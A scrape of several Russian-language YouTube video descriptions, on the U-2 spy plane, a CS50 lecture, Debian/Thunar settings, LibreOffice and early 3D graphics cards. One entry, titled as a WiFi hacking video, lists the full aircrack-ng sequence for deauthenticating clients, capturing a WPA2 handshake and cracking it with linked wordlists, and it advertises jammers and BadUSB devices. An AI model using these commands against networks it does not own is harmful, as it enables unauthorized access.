Lockheed U-2 | Великий папарацци


Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.

Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.

За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.

Приятного просмотра!

Подписывайтесь на канал, комментируйте, ставьте лайк!
Наша группа ВК: vk.com/club123681709
Инстаграм: www.instagram.com/karen_skyships

Вступайте в Air Public — одну из самых активных страниц, посвященных авиации Вконтакте: vk.com/air_public

1. CS50 на русском: Лекция #1 [Гарвард, Основы программирования, осень 2015 год]


Доп. материалы и задачи к лекции — javarush.ru/s/level_0
Весь курс CS50 — javarush.ru/s/course_cs50

Это Хогвартс? Нет, друзья, это Гарвард и первая лекция (Week 0) легендарного курса по основам программирования CS50 с русским переводом.

Даже на этом вводном занятии (хотя мозг отказывается воспринимать это яркое интерактивное действо как «занятие») @David Malan уже успел рассказать и показать много интересного.

Вот о чем:

• родной язык компьютеров — двоичная система счисления
• ASCII — как записываются символы
• как алгоритмизировать задачи — на живых примерах. Очень живых=)
• почему Дэвид разорвал телефонный справочник или что такое двоичный поиск
• сложность алгоритма — что, как и почему
• о том, что такое циклы, расскажет никто иной, как Марк Цукерберг, основатель Facebook
• …а еще вы увидите его же в 2005 году, в качестве приглашенного гостя CS50. Хм… судя по аудитории, интерес к технологиям вырос в десятки раз!

Подписывайтесь на наш канал, чтобы не пропускать лекции: www.youtube.com/channel/UCMcDsSeqS531-HKz6GiJgtA/featured

И не забывайте заниматься на JavaRush: javarush.ru

Перевод осуществлен cтудией VertDider совместно с JavaRush (http://javarush.ru).

Debian.ч6. Автомонтирование разделов. Добавляем строку в Thunar запуск от Root.


Настраиваем автомонтирование разделов и добавляем строку в Thunar запуск от Root.

Автомонтирование разделов и Thunar от Root
Автомонтирование разделов.
Установить пакет
sudo apt-get install ntfs-3g ntfs-config
Необходимы для работы с разделами NTFS
Автомонтирование разделов настроить программой Диски.

Добавляем строку в Thunar запуск от Root
Если не установлена, то установить утилиту gksu — sudo apt install gksu
В Thunar кликаем Правка-Особые действия- (добавить)
1 для запуска самого Thunar от root во вкладке Основное Имя пишем —
Открыть каталог от администратора. Описание тоже — Открыть каталог с правами администратора
Команда gksu thunar %f
Во вкладке Условия появления отмечаем Каталоги
2 для редактирования конфигов во вкладке Основное Имя пишем —
Редактировать от администратора. Описание тоже — Редактировать от администратора.
Команда gksu gedit %f
Или вместо gedit (его нужно до установить) вписать любой другой текстовой редактор, по умолчанию в Дебиане это Mousepad.
Команда gksu mousepad %f
Во вкладке Условия появления отмечаем Текстовые файлы и Другие файлы.

Теперь через правую клавишу мыши можно открыть конфиг для правки с правами администратора.

Посильная помощь каналу.
Яндекс деньги — money.yandex.ru/to/410019152018457
Карта Сбербанка — На странице сайта prostolinux.my1.ru/index/o_sajte/0-8

{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind


✓ Наш канал в Телеграме: durov.cc/under_public

ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута

● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.

● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i

● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

● Набор словарей:
goo.gl/z7mnhf — Даты, использовать первым
goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
goo.gl/bVsfo2 — Элитный словарь от InsidePRO
goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов

— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk

— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats

— ● Лучшие товары для xaЦkера:

✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7

✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf

✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62

✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm

✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp

✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT

✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP

✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3

✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt

✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5

✓ USB to Ethernet адаптер: ali.pub/4hhxux

✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW

✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ

✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q

✓ Недорогие, но очень мощные рации: goo.gl/dKibg5

✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga

✓ Микро камера: ali.pub/4hhy49

✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav

✓ Коврик для мыши с подсветкой: ali.pub/4hhycm

— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.

● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…

● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind

Знакомство с Libreoffice Writer (аналог Word)


Скачать Libreoffice: ru.libreoffice.org/download/

LibreOffice Writer это бесплатная и очень гибко настраиваемая программа для создания и редактирования текстовых документов с поддержкой таблиц, изображений, различного форматирования и мультимедиа. Это видео познакомит вас с LibreOffice Writer и поможет настроить программу для удобного использования. Рассматривается переключение между режимами интерфейса (классический, однострочный, вкладки, групповая лента, контекстный), настройка отображения документа, боковая панель, настройка панелей и размеров значков. Также показано, как сохранять документы в форматах Word (doc и docx).

История 3D-ускорителей (1996...2003)


Второе видео вокруг и около систем под процессоры с разъёмом Slot 1.
В этом видео я рассказываю про зарождение трёхмерной графики на ПК и о её аппаратном ускорении.
Начиная от 3Dfx Voodoo и заканчивая nVidia GeForce FX/ATI Radeon 9xxx.
Даты, техпроцессы, конвейеры, частоты и DirectXы.

Содержание:
01:34 — 3Dfx Voodoo Graphics (1996)
02:30 — nVidia Riva 128 (NV3, 1997)
02:47 — появление разъёма AGP
03:28 — ATI 3D Rage Pro (R3P, 1997)
04:22 — 3Dfx Voodoo2 (SST96, 1998)
06:46 — появление технологии SLI
09:01 — nVidia Riva TNT (NV4, 1998)
09:38 — ATI 3D Rage 128 GL (R4G, 1998)
12:00 — nVidia Riva TNT2 (NV5, 1999)
12:33 — 3Dfx Voodoo3 (Avenger, 1999)
13:26 — ATI Rage 128 Pro (R5, 1999)
14:44 — Transform